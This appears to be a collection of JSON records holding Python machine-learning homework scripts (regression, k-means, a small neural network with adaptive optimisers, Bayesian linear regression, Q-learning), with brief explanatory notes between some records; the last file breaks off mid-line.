"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport random as rnd\nfrom sklearn.model_selection import train_test_split\n\n\n# Sigmoid\ndef sigmoidMatrix(x, j):\n X = np.empty((len(x), j+1))\n i = 0\n min = np.min(x)\n max = np.max(x)\n step = (max-min) / j\n std = np.std(x)/50\n for xi in x:\n row = np.empty(j+1)\n for n in range(j+1):\n u = n*step\n row[n] = 1 / (1 + np.exp(-1 * (xi-u)/std))\n X[i] = row\n i = i + 1\n return X\n\n# Gaussian\ndef gaussianMatrix(x, j):\n X = np.empty((len(x), j+1))\n i = 0\n min = np.min(x)\n max = np.max(x)\n step = (max-min) / j\n s = np.std(x)\n s = np.mean(x)\n # s = (max-min) / j\n for xi in x:\n row = np.empty(j+1)\n for n in range(j+1):\n u = n*step\n row[n] = np.exp( -1 * ((xi - u)**2 / (2 * s**2)))\n X[i] = row\n i = i + 1\n return X\n\n# Polynomial\ndef polynomialMatrix(x, degree):\n X = np.empty((len(x), degree+1))\n i = 0\n for xi in x:\n row = np.empty(degree+1)\n for n in range(degree+1):\n row[n] = xi**n\n X[i] = row\n i = i + 1\n return X\n\ndef sum_square_error(Y, T):\n return 0.5 * np.sum(np.square(np.subtract(Y, T)))\n\n\n# Read file\nx,t = [], []\nwith open('regression_x_t.txt') as file:\n i = 0\n for line in file:\n xtemp, ttemp = line.split(' ')\n i = i + 1\n x.append(float(xtemp))\n t.append(float(ttemp))\n\n# Split file into training and Test Sets\n\nx_train, x_test, t_train, t_test = train_test_split(x, t, test_size=0.20, random_state=42)\n\n# Convert python list to vector (Matrix)\nt_train = np.array(t_train)\nt_train = np.expand_dims(t_train, axis=1)\n\n# W Coefficients\nj = 20\npolynomial_degree = j\nlearning_rate = 1e-2\n# X = polynomialMatrix(x_train, polynomial_degree)\n# X = gaussianMatrix(x_train, polynomial_degree)\n##############################################################################\n#BGD Sigmoid\nX = sigmoidMatrix(x_train, j)\nW = np.zeros((j+1, 1))\nY = np.dot(X, W)\n\nerr = sum_square_error(Y, t_train)\nerrs = []\nerrs.append(err)\nfor itr in range(20000):\n # W = np.subtract(W , (1/len(t_train)) * learning_rate * np.dot(X.T,np.subtract(Y, t_train)))\n W = np.subtract(W , (1/len(t_train)) * learning_rate * np.dot(X.T,np.subtract(Y, t_train)))\n Y = np.dot(X, W)\n err = sum_square_error(Y, t_train)\n errs.append(err)\n\n\nplt.title(\"HW1.1.a decreasing of error function with the increasing of iteration numbers\")\nplt.plot(errs)\nplt.xlabel(\"x\")\nplt.ylabel(\"Y\")\nplt.show()\nprint(\"HW1.1.b SGD obtained coefficient W\")\nprint(W)\n\nXTest = sigmoidMatrix(x_test, j)\nYTestPredict = np.dot(XTest, W)\nplt.title(\"HW1.1.c predicted f(x) vs. 
Actual Target t\")\nplt.scatter(x_test, YTestPredict)\nplt.scatter(x_test, t_test)\nplt.show()\nrms = np.sqrt(2 * sum_square_error(YTestPredict, t_test) / len(t_test))\nprint(\"HW1.1.d SGD Test Set RMS: \")\nprint(rms)\n\n\n\n#############################################################################\n#Stochastic \nrandomIndexes = []\nfor i in range(len(t_train)):\n randomIndexes.append(i)\n\nrnd.shuffle(randomIndexes)\nW = np.zeros((j+1, 1))\nY = np.dot(X, W)\nerr = sum_square_error(Y, t_train)\nerrs = []\nerrs.append(err)\nfor itr in range(400):\n for stoc in randomIndexes:\n #get random point\n i = stoc # rnd.randint(0, len(t_train)-1)\n Xi = X[i]\n Xi = np.reshape(Xi, (1,j+1))\n Yi = np.dot(Xi, W)\n grad = Xi.T * np.subtract(Yi, t_train[i])\n W = np.subtract(W , (1.0/j) * learning_rate * grad)\n Y = np.dot(X, W)\n err = sum_square_error(Y, t_train)\n errs.append(err)\n\nplt.title(\"HW1.2.a decreasing of error function with the increasing of iteration numbers\")\nplt.plot(errs)\nplt.xlabel(\"x\")\nplt.ylabel(\"Y\")\nplt.show()\n\nprint(\"HW1.2.b Stochastic obtained coefficient W\")\nprint(W)\n\nYTestPredict = np.dot(XTest, W)\nplt.title(\"HW1.2.c predicted f(x) vs. Actual Target t\")\nplt.scatter(x_test, YTestPredict)\nplt.scatter(x_test, t_test)\nplt.show()\nrms = np.sqrt(2 * sum_square_error(YTestPredict, t_test) / len(t_test))\n\nprint(\"Stochastic RMS: \")\nprint(rms)\n\n\n#############################################################################\n#Maximum likelihood \n\nMLHW = np.dot( np.dot( np.linalg.inv( np.dot(X.T, X)), X.T), t_train)\nYTestPredict = np.dot(XTest, MLHW)\nplt.title(\"HW1.3.c predicted f(x) vs. Actual Target t\")\nplt.scatter(x_test, YTestPredict)\nplt.scatter(x_test, t_test)\nplt.show()\nrms = np.sqrt(2 * sum_square_error(YTestPredict, t_test) / len(t_test))\nprint(\"HW1.3.a Maximum Likelihood W\")\nprint(MLHW)\n\nprint(\"HW1.3.d Maximum Likelihood RMS: \")\nprint(rms)\n\n"
},
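Note: hw1.py above computes the maximum-likelihood weights with an explicit matrix inverse, W = inv(X^T X) X^T t. A least-squares solver gives the same solution without forming the inverse and behaves better when X^T X is ill-conditioned. A minimal sketch under the assumption of a random design matrix with the script's shapes (the data itself is a placeholder, not the homework file):

```python
import numpy as np

# Placeholder design matrix and targets with the shapes hw1.py produces
# (21 sigmoid basis functions, one target column).
X = np.random.rand(100, 21)
t = np.random.rand(100, 1)

# Explicit normal-equation solution, as in the script:
W_inv = np.linalg.inv(X.T @ X) @ X.T @ t

# Equivalent least-squares solve; avoids forming the inverse explicitly.
W_lstsq, *_ = np.linalg.lstsq(X, t, rcond=None)
print(np.allclose(W_inv, W_lstsq))  # True up to numerical tolerance
```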
{
"alpha_fraction": 0.4920634925365448,
"alphanum_fraction": 0.5063223242759705,
"avg_line_length": 32.19643020629883,
"blob_id": "d821698fa9b2df8b50a67638461118c1e233fa42",
"content_id": "da19e642c4f3592bfa261757c35ac11a5c145a77",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3717,
"license_type": "no_license",
"max_line_length": 248,
"num_lines": 112,
"path": "/HW4/kmeans.py",
"repo_name": "almajeas/CS229ML",
"src_encoding": "UTF-8",
"text": "import random\nimport time\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\ndef sse(centroids, pts):\n sum = 0\n for i, centroid in enumerate(centroids):\n for pt in pts[i]:\n sum += math.sqrt((centroid[0] - pt[0])**2 + (centroid[1] - pt[1])**2)\n return sum\n\ndef distance(a, b):\n return math.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)\n\npoints = []\nwith open('clu_data.txt') as file:\n for line in file:\n xtemp, ytemp = line.split(' ')\n points.append((float(xtemp), float(ytemp)))\n\n\nminX, maxX = min(points)[0], max(points)[0]\nminY, maxY = min(points)[1], max(points)[1]\nprint(f\"minX = {minX}, MaxX = {maxX}, minY = {minY}, maxY = {maxY} \")\n\nepochs = 40\ncolors = ['maroon', 'b', 'g', 'r', 'c', 'm', 'y', 'k', 'orange', 'gold', 'teal', 'brown', 'coral', 'khaki', 'lime', 'magenta', 'olive', 'navy', 'lavender', 'grey', 'gold', 'darkgreen', 'silver', 'wheat', 'orchid', 'pink', 'purple', 'tan', 'sienna']\nax = plt.gca()\nthreshold = 0.02\nsse_data = {}\nKmeansRange = range(2, 22)\nfor K in KmeansRange:\n sse_data[K] = []\n for trial in range(10):\n converged = False\n Ks = []\n clusters = {}\n for k in range(K):\n x = random.uniform(minX, maxX)\n y = random.uniform(minY, maxY)\n Ks.append((x, y))\n\n for epoch in range(epochs):\n if converged:\n s = f\"output/K-{K}-trial-{trial+1}-converged-{epoch+1}.png\"\n plt.savefig(s)\n print(f\"K = {K}, Trial {trial}, Converged by epoch {epoch}\")\n print(f\"K={K}, Trial #{trial+1}, Epoch #{epoch+1}, SSE={sse(Ks, clusters)}\")\n # plt.pause(1)\n plt.close()\n break\n else:\n plt.close()\n for k in range(K):\n clusters[k] = []\n\n for i in range(len(points)):\n closestCluster = 0\n d = distance(Ks[0], points[i])\n for k in range(1, K):\n dTemp = distance(Ks[k], points[i])\n if dTemp < d:\n d = dTemp\n closestCluster = k\n clusters[closestCluster].append(points[i])\n for k in range(K):\n x_val = [x[0] for x in clusters[k]]\n y_val = [x[1] for x in clusters[k]]\n color = next(ax._get_lines.prop_cycler)['color']\n plt.xlabel(\"x\")\n plt.ylabel(\"y\")\n plt.scatter(x_val,y_val, color=colors[k])\n plt.scatter(Ks[k][0], Ks[k][1], marker='+', color=colors[k])\n sse_data[K].append(sse(Ks, clusters))\n plt.title(f\"K={K}, Trial #{trial+1}, Epoch #{epoch+1}, SSE={sse_data[K][-1]:.2f}\")\n plt.show(block=False)\n converged = True\n for k in range(K):\n if len(clusters[k])> 0:\n mean = np.mean(clusters[k], axis=0)\n mean = (mean[0], mean[1])\n if distance(mean, Ks[k]) > threshold:\n converged = False\n Ks[k] = mean\n\nks = []\nsses = []\nfor K in KmeansRange:\n print(f\"{K} -- {min(sse_data[K])}\")\n ks.append(K)\n sses.append(min(sse_data[K]))\nplt.clf()\nplt.title(\"Sum Square Errors vs K\")\nplt.xlabel(\"K\")\nplt.ylabel(\"SSE\")\nplt.scatter(ks, sses , color=colors[0])\nprint(ks)\nprint(sses)\ns = f\"output/ScatterSSEoverBestKs-{KmeansRange[0]}-{KmeansRange[-1]}.png\"\nplt.savefig(s)\nplt.show()\n\n\nplt.clf()\nplt.title(\"Sum Square Errors vs K\")\nplt.xlabel(\"K\")\nplt.ylabel(\"SSE\")\nplt.plot(ks, sses , color=colors[0])\ns = f\"output/PlotSSEoverBestKs-{KmeansRange[0]}-{KmeansRange[-1]}.png\"\nplt.savefig(s)\nplt.show()"
},
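Note: kmeans.py above computes assignments and centroid updates with per-point Python loops. The same iteration can be vectorized with NumPy broadcasting; a sketch on synthetic data (all data and constants here are illustrative), using the same movement-threshold convergence idea as the script's 0.02 cutoff:

```python
import numpy as np

rng = np.random.default_rng(0)
pts = rng.random((200, 2))                       # synthetic 2-D points
K = 5
centroids = pts[rng.choice(len(pts), K, replace=False)]

for _ in range(40):
    # Distances of every point to every centroid via broadcasting: shape (200, K).
    d = np.linalg.norm(pts[:, None, :] - centroids[None, :, :], axis=2)
    labels = d.argmin(axis=1)                    # nearest-centroid assignment
    # Move each centroid to the mean of its members; keep empty clusters in place.
    new = np.array([pts[labels == k].mean(axis=0) if np.any(labels == k)
                    else centroids[k] for k in range(K)])
    if np.abs(new - centroids).max() < 0.02:     # movement-threshold convergence
        break
    centroids = new
print(centroids.round(3))
```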
{
"alpha_fraction": 0.6172516942024231,
"alphanum_fraction": 0.633432924747467,
"avg_line_length": 34.87053680419922,
"blob_id": "94a2f57d88873b94935bfe53210ab8a63d81eede",
"content_id": "65d6cd422021be4173505b7c0e790be5aeb600e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8034,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 224,
"path": "/HW3/hw3.py",
"repo_name": "almajeas/CS229ML",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\n\n# Generate Nonlinear samples y = x1 + x2**2 + (x1 - cos(x2))**2\ndef nonlinearfunction(x):\n output = []\n output.append(x[:,0] + x[:,1]**2 + (x[:,0] - np.cos(x[:,1]))**2 + np.random.normal(0, 0.1, len(x)))\n return np.array(output).T\n\n# sigmoid activation function\ndef sigmoid(x):\n return 1.0 / (1.0 + np.exp(-1.0 * x))\n\n#sigmoid derivative function\ndef sigmoidDerivative(x):\n return sigmoid(x) * (1 - sigmoid(x))\n\n#ReLU Activation Function\ndef ReLU(x):\n return x * (x > 0)\n\n#ReLU Derivative function\ndef ReLUDerivative(x):\n x[x<=0] = 0\n x[x>0] = 1\n return x\n\n#Activation function in Use\ndef activation(x):\n return sigmoid(x)\n # return ReLU(x)\n\n#derivative function in use\ndef activationDerivative(x):\n return sigmoidDerivative(x)\n # return ReLUDerivative(x)\n\n#Root Mean Square Error function\ndef RMSE(y, t):\n return np.sqrt(np.sum((y - t.T)**2))/ len(y)\n\nepochs = 200 # number of epochs\nlearning_rate = 0.0001 # learning rate\ninput_dimensions = 2 #Input variables for the NN first layer\ninput_points = 1250 # total generated samples\noutput_dimensions = 1 #output of the NN layer\n\n# Generate re()\n# BGD_Adadelta()andom samples + noise\nX = np.random.uniform(low=0, high=1, size=(input_points, input_dimensions))\n\n# Calculate Ground Truth for the generated samples using non-linear function\nT = nonlinearfunction(X)\n\n#Split into Training and Test Sets\nx_train, x_test, t_train, t_test = train_test_split(X, T, test_size=0.20, random_state=42)\n\n# Define Neural Network\n\n## structure of NN in array from, each element is a layer.\n## starting with input layer and ending with output layer\nneurons_per_layer = np.array([input_dimensions, 2, output_dimensions])\n\n\nNN = list() ##Neural Network object\nW = list() ## Weights\nWgrad = list() ## Weights gradient calculations (back propagation)\nB = list() ## Biases\nBgrad = list() ## Biases gradient calculations (back propagation)\nWgrads = list()## AdaGrad time sum gradients for W\nBgrads = list()## AdaGrad time sum gradients for biases\nEg2W = list()##RMSprob sum for square gradients of W\nEg2B = list()##RMSprob sum for square gradients of B\n## Initialize Weights, Biases, Gradients\ndef initialize():\n ##Initialize NN\n NN.clear() ##Neural Network object\n W.clear() ## Weights\n Wgrad.clear() ## Weights gradient calculations (back propagation)\n B.clear() ## Biases\n Bgrad.clear() ## Biases gradient calculations (back propagation)\n Wgrads.clear() ## AdaGrad time sum gradients for W\n Bgrads.clear() ## AdaGrad time sum gradients for biases\n Eg2W.clear() ##RMSprob sum for square gradients of W\n Eg2B.clear() ##RMSprob sum for square gradients of B\n for i in range(len(neurons_per_layer)):\n NN.append(np.zeros((neurons_per_layer[0], 1)))\n for i in range(len(neurons_per_layer) -1 ):\n W.append(np.random.randn(neurons_per_layer[i+1], neurons_per_layer[i]))\n Wgrad.append(np.zeros((neurons_per_layer[i+1], neurons_per_layer[i])))\n Wgrads.append(np.zeros((neurons_per_layer[i+1], neurons_per_layer[i])))\n Eg2W.append(np.zeros((neurons_per_layer[i+1], neurons_per_layer[i])))\n B.append(np.random.randn(neurons_per_layer[i+1] , 1))\n Bgrad.append(np.zeros((neurons_per_layer[i+1] , 1)))\n Bgrads.append(np.zeros((neurons_per_layer[i+1] , 1)))\n Eg2B.append(np.zeros((neurons_per_layer[i+1] , 1)))\n\n\n## forward pass \ndef forward():\n for i in range(len(W)):\n NN[i+1] = 
np.dot(W[i], NN[i]) + B[i]\n## back propagation (l is the current layer, seg is the error, Z is the input)\ndef backpropagate(l, seg, Z):\n if l < 0:\n return \n Wgrad[l] = np.dot(seg, Z.T)\n Bgrad[l] = np.sum(seg, axis=1, keepdims=True)/len(x_train)\n backpropagate(l-1, activationDerivative(NN[l]) * np.dot(W[l].T, seg), activation(NN[l-1]) )\n return\n\n\n## Neural Network training. BGD\ndef BGD():\n ##lists to keep track of errors for plotting.\n training_errors = []\n testing_errors = []\n for epoch in range(epochs):\n NN[0] = x_train.T\n forward()\n backpropagate(len(Wgrad) -1 , np.subtract(NN[-1], t_train.T), activation(NN[-2]))\n for l in range(len(W)):\n W[l] = W[l] - learning_rate * Wgrad[l]\n B[l] = B[l] - learning_rate * Bgrad[l]\n training_errors.append(RMSE(NN[-1],t_train))\n NN[0] = x_test.T \n forward()\n testing_errors.append(RMSE(NN[-1], t_test))\n print(f\"{epoch} - {training_errors[-1]}\")\n\n # # plotting for HW\n # plt.title(f\"HW3.2.1 RMSE with epochs on Training Set\\nNeural Network Layers: {neurons_per_layer}\")\n # plt.plot(training_errors, color='orange', label='Training Set')\n # plt.xlabel(\"Epochs\")\n # plt.ylabel(\"Error\")\n # plt.legend()\n # plt.show()\n\n plt.title(f\"HW3.2.2 RMSE with epochs on Training and Testing Sets\\nNeural Network Layers: {neurons_per_layer}\")\n plt.plot(training_errors, color='orange', label='Training Set')\n plt.plot(testing_errors, color='green', label=\"Testing Set\")\n plt.xlabel(\"Epochs\")\n plt.ylabel(\"Error\")\n plt.legend()\n plt.show()\n\n\n # plt.title(f\"HW3.Bonus Baseline BGD RMSE with epochs on Training and Testing Sets\\nNeural Network Layers: {neurons_per_layer}\")\n # plt.plot(training_errors, color='orange', label=f'BGD Training Set')\n # plt.plot(testing_errors, color='green', label=f\"BGD Testing Set\")\n # plt.xlabel(\"Epochs\")\n # plt.ylabel(\"Error\")\n # plt.legend()\n\ndef BGD_AdaGrad():\n epsilon = 10e-8\n learning_rate = 1\n ##lists to keep track of errors for plotting.\n training_errors = []\n testing_errors = []\n for epoch in range(epochs):\n NN[0] = x_train.T\n forward()\n backpropagate(len(Wgrad) -1 , np.subtract(NN[-1], t_train.T), activation(NN[-2]))\n training_errors.append(RMSE(NN[-1],t_train))\n for l in range(len(W)):\n Wgrads[l] += Wgrad[l]**2\n Bgrads[l] += Bgrad[l]**2\n W[l] = W[l] - ((learning_rate/ np.sqrt(epsilon + Wgrads[l])) * Wgrad[l])\n B[l] = B[l] - ((learning_rate/ np.sqrt(epsilon + Bgrads[l])) * Bgrad[l])\n NN[0] = x_test.T \n forward()\n testing_errors.append(RMSE(NN[-1], t_test))\n print(f\"{epoch} - {training_errors[-1]}\")\n\n plt.title(f\"HW3.Bonus AdaGrad RMSE with epochs on Training and Testing Sets\\nNeural Network Layers: {neurons_per_layer}\")\n plt.plot(training_errors, color='red', label='AdaGrad Training Set')\n plt.plot(testing_errors, color='blue', label=\"AdaGrad Testing Set\")\n plt.xlabel(\"Epochs\")\n plt.ylabel(\"Error\")\n plt.legend()\n plt.show()\n\n\n\ndef BGD_RMSprop():\n gamma = 0.9\n epsilon = 10e-8\n ##lists to keep track of errors for plotting.\n training_errors = []\n testing_errors = []\n for epoch in range(epochs):\n NN[0] = x_train.T\n forward()\n backpropagate(len(Wgrad) -1 , np.subtract(NN[-1], t_train.T), activation(NN[-2]))\n training_errors.append(RMSE(NN[-1],t_train))\n for l in range(len(W)):\n Eg2W[l] = (1 - gamma)*Wgrad[l]**2 + gamma * Eg2W[l]\n Eg2W[l] = (1 - gamma)*Wgrad[l]**2 + gamma * Eg2B[l]\n W[l] = W[l] - ((learning_rate/ np.sqrt(epsilon + Eg2W[l])) * Wgrad[l])\n B[l] = B[l] - ((learning_rate/ np.sqrt(epsilon + Eg2B[l])) * 
Bgrad[l])\n NN[0] = x_test.T \n forward()\n testing_errors.append(RMSE(NN[-1], t_test))\n print(f\"{epoch} - {training_errors[-1]}\")\n\n plt.title(f\"HW3.Bonus AdaGrad RMSprop RMSE with epochs on Training and Testing Sets\\nNeural Network Layers: {neurons_per_layer}\")\n plt.plot(training_errors, color='magenta', label='RMSprob Training Set')\n plt.plot(testing_errors, color='gray', label=\"RMSprob Testing Set\")\n plt.xlabel(\"Epochs\")\n plt.ylabel(\"Error\")\n plt.legend()\n plt.show()\n\ninitialize()\nBGD()\n\n# initialize()\n# BGD_AdaGrad()\n\n# initialize()\n# BGD_RMSprop()"
},
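Note: the RMSprop variant in hw3.py keeps an exponential moving average of squared gradients per parameter, E[g^2] <- gamma*E[g^2] + (1-gamma)*g^2, and scales each step by 1/sqrt(E[g^2] + eps). The toy quadratic below shows just that update in isolation; the loss, learning rate, and iteration count are illustrative assumptions, not values from the homework:

```python
import numpy as np

gamma, lr, eps = 0.9, 0.05, 1e-8     # illustrative hyperparameters
w = np.zeros(3)                      # parameters of a toy quadratic loss
Eg2 = np.zeros_like(w)               # running average of squared gradients

for _ in range(500):
    g = 2.0 * (w - 1.0)              # gradient of sum((w - 1)^2)
    Eg2 = gamma * Eg2 + (1.0 - gamma) * g**2
    w -= lr / np.sqrt(Eg2 + eps) * g
print(w.round(3))                    # close to the optimum at 1.0
```

Keeping separate accumulators for weights and biases, as the script does with Eg2W and Eg2B, matters: reusing one accumulator for both (the bug fixed above) silently distorts the effective step size.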
{
"alpha_fraction": 0.5765158534049988,
"alphanum_fraction": 0.6025024056434631,
"avg_line_length": 29.2718448638916,
"blob_id": "25a1338e47012e14419c21ec6c716eb215c507a5",
"content_id": "e2046d6374bbcaac28cf56405159baf182797d3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3117,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 103,
"path": "/HW2/hw2.py",
"repo_name": "almajeas/CS229ML",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport random as rnd\nimport seaborn as sns\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\ndef calc_t(x):\n return -0.3 + 0.5 * x\n\ndef prior(W, m, cov):\n return np.exp((-1.0/2)*(W-m).T.dot(np.dot(np.linalg.inv(cov),(W-m))))\n\ndef plot_sampled_points(X, t):\n points = pd.DataFrame({'x': X[:, 0], 'y': t[:, 0]})\n sns.lmplot(x='x', y='y', data=points , height=40)\n lim = 1.3\n plt.xlim(-lim, lim)\n plt.ylim(-lim, lim)\n plt.show()\n\n#data range\nlim = 1.0\nr = np.arange(-lim, lim, 0.05)\nnum = len(r)\n\n#plot configuration initialization\nrows = num \ncols = 3\nfig, axes = plt.subplots(rows,cols, figsize=(cols*4 , rows*4 ), dpi=100)\nfig.subplots_adjust(hspace = 0.3, wspace=0.3)\naxs = axes.ravel()\npltctr = 0\n\n#Parameter Initialization\nalpha = 2.0\nbeta = 25\nmu = 0 \nsigma = 0.2\ncovariance_matrix = (1/alpha) * np.identity(2, dtype=float)\n\n#Matrix population\nW = np.zeros((2, 1))\nX = np.random.uniform(-lim, lim, len(r))\nX = np.reshape(X,(len(X), 1))\nt = np.empty(X.shape)\n\n#Calculating t and addition noise\nfor i in range(len(X)):\n t[i] = calc_t(X[i])+ np.random.normal(mu, 1/beta)\nposterior_matrix = np.ones((len(X), len(t)))\nlikelihood_matrix = np.ones((len(X), len(t)))\n\n\nfor ctr in range(num):\n for i, w0 in enumerate(r):\n for j, w1 in enumerate(r):\n if ctr == 0:\n posterior_matrix[j][i] = prior(np.array([[w0], [w1]]), 0, covariance_matrix)\n likelihood_matrix[j][i] = np.exp((-beta/2.0) * (t[ctr] - (w0 + w1*X[ctr]))**2)\n \n ## Plotting Prior/Posterior\n pltctr += 1\n axs[pltctr].set_xlim([-lim, lim])\n axs[pltctr].set_ylim([-lim, lim])\n axs[pltctr].contourf(r, r, posterior_matrix, cmap='jet')\n axs[pltctr].set_title(\"Prior/Posterior\")\n axs[pltctr].set(xlabel='w0', ylabel='w1')\n axs[pltctr].plot(-0.3, 0.5, marker=\"+\", color='w')\n \n ##Sampling and plotting dataspace\n pltctr += 1\n for i in range(6):\n xs, ys = np.unravel_index(np.random.choice(posterior_matrix.size, p=posterior_matrix.ravel()/float(posterior_matrix.sum())), posterior_matrix.shape)\n w1 = 2 * ((xs)/(len(r))) - 1 #Normalize index to -1, 1\n w0 = 2 * ((ys)/(len(r))) - 1 #Normalize index to -1, 1\n x = np.linspace(-1,1,len(r))\n y = w1*x + w0\n axs[pltctr].plot(x, y, '-r')\n markersX = []\n markersY = []\n for k in range(ctr+1):\n markersX.append(X[k])\n markersY.append(t[k])\n axs[pltctr].plot(markersX, markersY, 'o', markerfacecolor='none')\n axs[pltctr].set_xlim([-lim, lim])\n axs[pltctr].set_ylim([-lim, lim])\n axs[pltctr].set(xlabel='x', ylabel='y')\n axs[pltctr].set_title(\"Data space\")\n\n posterior_matrix = posterior_matrix * likelihood_matrix\n if ctr == num - 1:\n break\n ##Plotting likelihood\n pltctr += 1\n axs[pltctr].set_xlim([-lim, lim])\n axs[pltctr].set_ylim([-lim, lim])\n axs[pltctr].contourf(r, r, likelihood_matrix, cmap='jet')\n axs[pltctr].set_title(\"Likelihood\")\n axs[pltctr].set(xlabel='w0', ylabel='w1')\n\nplt.savefig('./plt.png')\n# plt.show()"
},
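Note: hw2.py above evaluates prior, likelihood, and posterior on a discretized weight grid. For a Gaussian prior N(0, (1/alpha)*I) and noise precision beta, the posterior is also available in closed form: S_N^{-1} = alpha*I + beta*Phi^T Phi and m_N = beta * S_N Phi^T t. A sketch of that closed form (noise is drawn with standard deviation 1/sqrt(beta), i.e. the precision convention, which differs slightly from the script's 1/beta):

```python
import numpy as np

alpha, beta = 2.0, 25.0
rng = np.random.default_rng(1)
x = rng.uniform(-1.0, 1.0, (20, 1))
t = -0.3 + 0.5 * x + rng.normal(0.0, 1.0 / np.sqrt(beta), x.shape)

Phi = np.hstack([np.ones_like(x), x])            # [1, x] design matrix
S_N = np.linalg.inv(alpha * np.eye(2) + beta * Phi.T @ Phi)
m_N = beta * S_N @ Phi.T @ t
print(m_N.ravel())                               # approaches (-0.3, 0.5)
```

The grid version is useful for visualizing how the posterior contracts point by point, while the closed form gives the exact mean and covariance in two matrix operations.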
{
"alpha_fraction": 0.5409918427467346,
"alphanum_fraction": 0.5530445575714111,
"avg_line_length": 42.49726867675781,
"blob_id": "2937e88a64a3fc642249c0b057983bf2e2832175",
"content_id": "3c17830997e419deac261d37f641b2df3d0610a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7965,
"license_type": "no_license",
"max_line_length": 203,
"num_lines": 183,
"path": "/HW5/qlearning.py",
"repo_name": "almajeas/CS229ML",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nOFF_POLICY = 0\nSARSA = 1\nUP = 0\nRIGHT = 1\nDOWN = 2\nLEFT = 3\nlr = 1\ny = 0.9\nPENALTY = -1\n\nclass Node:\n def __init__(self,reward=0, up=0.0, right=0.0, down=0.0, left=0.0):\n self.values = np.array([up, right, down, left], dtype=np.dtype('Float64'))\n self.reward = reward\n def get_max_value(self):\n return np.amax(self.values)\n def get_max_direction(self):\n maximum_locations = np.where(self.values == np.amax(self.values))\n return maximum_locations[0]\n def __str__(self):\n s = f\"{self.values}\"\n return s\n\nclass RL:\n def __init__(self, mode=OFF_POLICY, epochs=1000, epsilon=0.2):\n self.mode = mode\n self.debug = False\n self.epsilon = epsilon\n self.epochs = epochs\n self.init_message()\n self.rows, self.columns = 4, 5\n self.grid = np.full((self.rows,self.columns),Node(), dtype=Node)\n rows, columns = self.grid.shape\n for row in range(rows):\n for col in range(columns):\n self.grid[row, col] = Node()\n self.grid[0,0] = Node(reward=10)\n self.grid[1,3] = Node(reward=-5)\n self.start = (self.rows-1, self.columns-1)\n self.current_loc = self.start\n def init_message(self):\n if self.mode == SARSA:\n print(f\"Initializing... mode = SARSA, epochs = {self.epochs}, debug = {self.debug}\")\n else:\n print(f\"Initializing... mode = QLearning OffPolicy, epochs = {self.epochs}, epsilon = {self.epsilon} debug = {self.debug}\")\n def p(self):\n rows, columns = self.grid.shape\n for row in range(rows):\n s = \"\"\n for col in range(columns):\n s += f\"{self.grid[row, col]} \"\n print(s)\n def step(self):\n # if self.mode == SARSA and np.random.rand() < self.epsilon:\n # selected_direction = np.random.randint(0,len(self.grid[self.current_loc].values))\n # else:\n # directions = self.grid[self.current_loc].get_max_direction()\n # selected_direction = directions[np.random.randint(0,len(directions))]\n # side, newLoc , reward = self.get_next_loc(selected_direction)\n # if self.debug:\n # print(f\"{self.grid[self.current_loc].values[selected_direction]} + {lr} * ({reward} + {y}*{self.grid[newLoc].get_max_value()}\")\n # print(f\"{self.grid[self.current_loc].values[selected_direction]}\")\n # if self.train:\n # self.grid[self.current_loc].values[selected_direction] += lr * (reward + y*self.grid[newLoc].get_max_value() - self.grid[self.current_loc].values[selected_direction])\n if self.mode == OFF_POLICY :\n if np.random.rand() < self.epsilon:\n selected_direction = np.random.randint(0,len(self.grid[self.current_loc].values))\n else:\n directions = self.grid[self.current_loc].get_max_direction()\n selected_direction = directions[np.random.randint(0,len(directions))]\n side, newLoc , reward = self.get_next_loc(selected_direction)\n if self.train:\n self.grid[self.current_loc].values[selected_direction] += lr * (reward + y*self.grid[newLoc].get_max_value() - self.grid[self.current_loc].values[selected_direction])\n else:\n if np.random.rand() < self.epsilon:\n selected_direction = np.random.randint(0,len(self.grid[self.current_loc].values))\n else:\n directions = self.grid[self.current_loc].get_max_direction()\n selected_direction = directions[np.random.randint(0,len(directions))]\n side, newLoc , reward = self.get_next_loc(selected_direction)\n if self.train:\n if np.random.rand() < self.epsilon:\n self.grid[self.current_loc].values[selected_direction] += lr * (reward + y*self.grid[newLoc].values[np.random.randint(0,4)] - self.grid[self.current_loc].values[selected_direction])\n else:\n self.grid[self.current_loc].values[selected_direction] += lr * (reward + 
y*self.grid[newLoc].get_max_value() - self.grid[self.current_loc].values[selected_direction])\n if self.debug:\n print(f\"{self.grid[self.current_loc].values[selected_direction]} + {lr} * ({reward} + {y}*{self.grid[newLoc].get_max_value()}\")\n print(f\"{self.grid[self.current_loc].values[selected_direction]}\")\n Qstar = self.grid[self.current_loc].values[selected_direction]\n loc = self.current_loc\n if newLoc == (0,0) :#or newLoc == (1,3):\n self.current_loc = self.start\n return loc, side, newLoc, Qstar\n self.current_loc = newLoc\n return loc, side, newLoc, Qstar\n def get_next_loc(self,direction):\n row, col = self.current_loc\n if direction == UP:\n if row == 0:\n return \"UP\", self.current_loc, PENALTY\n else:\n return \"UP\", (row-1, col), self.grid[(row-1, col)].reward\n if direction == RIGHT:\n if col == self.columns - 1:\n return \"RIGHT\", self.current_loc, PENALTY\n else:\n return \"RIGHT\", (row, col+1), self.grid[(row, col+1)].reward\n if direction == DOWN:\n if row == self.rows - 1:\n return \"DOWN\", self.current_loc, PENALTY\n else:\n return \"DOWN\", (row+1, col), self.grid[row+1, col].reward\n if direction == LEFT:\n if col == 0:\n return \"LEFT\", self.current_loc, PENALTY\n else:\n return \"LEFT\", (row, col-1), self.grid[(row, col-1)].reward\n def learn(self):\n self.train = True\n for _ in range(self.epochs):\n self.step()\n self.trainl = False\n def print_result(self):\n self.mode = OFF_POLICY\n self.epsilon 